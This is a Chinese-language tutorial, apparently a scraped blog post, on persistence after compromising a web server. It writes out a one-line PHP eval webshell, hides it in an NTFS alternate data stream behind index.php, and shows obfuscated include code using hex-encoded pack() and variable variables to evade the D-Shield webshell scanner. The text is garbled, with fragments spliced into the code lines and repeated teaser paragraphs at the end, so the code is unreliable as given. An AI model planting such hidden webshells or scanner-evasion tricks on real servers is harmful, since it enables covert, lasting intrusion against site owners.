未知攻,焉知防,在web端如何做手腳維護自己拿到的許可權呢?首先要面臨的是webshell查殺,那麼通過利用ads隱藏webshell,不失為乙個好辦法。
關於ads的介紹,就不再闡述,詳見尾部參考資料。
php 一句話木馬:<?php @eval($_post['chopper']);?>,當然也可以直接製作免殺php一句話,畢竟php千變萬化,從變數,陣列,賦值,運算,函式等,各種變種。。。
製作步驟一:建立ads隱藏檔案
在伺服器上echo乙個資料流檔案進去,比如index.php是網頁正常檔案,我們可以這樣子搞:
這樣子就生成了乙個不可見的shell hidden.jpg,常規的檔案管理器、type命令,dir命令、del命令發現都找不出那個hidden.jpg的。
問題1:如何檢視index.php:hidden.jpg內容呢?
進入檔案所在目錄,notepad index.php:hidden.jpg 或者 dir /r
問題2:如何刪除index.php:hidden.jpg?
直接刪除index.php即可
製作步驟二:檔案包含
乙個正常檔案裡把這個ads檔案include進去,<?php include(『index.php:hidden.jpg』)?>,這樣子就可以正常解析我們的一句話了。
但是卻非常容易被webshell查殺工具查到,看到可疑引用的檔名,分分鐘出局了。
製作步驟三:如何繞過檢測
這邊要解決的是include函式,如何讓它檢測不出來有可疑引用檔案呢?
在某次應急響應事件中,獲取到一段**,這裡拿來改造一下。**如下:
<?phpphp pack() 函式 函式介紹:@include(pack('h*
','xx
'));
?>
將index.php:hidden.jpg進行hex編碼
<?php @include(pack('h*再次用d盾_web查殺進行掃瞄,還是被查到了。','696e6465782e7068703a68696464656e2e6a7067
'));?>
進一步利用php 可變變數進行二次轉換,最後得到繞過d盾掃瞄的姿勢如下:
<?php繞過d盾_web查殺如圖:$a="
696e6465782e7068703
"."a68696464656e2e6a7067";
$b="a"
;include(pack('h*
',$$b))
?>
許可權維持,也是一門很重要的課題,熟悉各種常見的後門技術,並懂得如何進行安全防禦。
web端許可權維持 利用ADS隱藏webshell
未知攻,焉知防,在web端如何做手腳維護自己拿到的許可權呢?首先要面臨的是webshell查殺,那麼通過利用ads隱藏webshell,不失為乙個好辦法。關於ads的介紹,就不再闡述,詳見尾部參考資料。php 一句話木馬 當然也可以直接製作免殺php一句話,畢竟php千變萬化,從變數,陣列,賦值,運...
web端許可權維持 利用ADS隱藏webshell
未知攻,焉知防,在web端如何做手腳維護自己拿到的許可權呢?首先要面臨的是webshell查殺,那麼通過利用ads隱藏webshell,不失為乙個好辦法。關於ads的介紹,就不再闡述,詳見尾部參考資料。php 一句話木馬 當然也可以直接製作免殺php一句話,畢竟php千變萬化,從變數,陣列,賦值,運...
web端許可權維持 利用ADS隱藏webshell
未知攻,焉知防,在web端如何做手腳維護自己拿到的許可權呢?首先要面臨的是webshell查殺,那麼通過利用ads隱藏webshell,不失為乙個好辦法。關於ads的介紹,就不再闡述,詳見尾部參考資料。php 一句話木馬 當然也可以直接製作免殺php一句話,畢竟php千變萬化,從變數,陣列,賦值,運...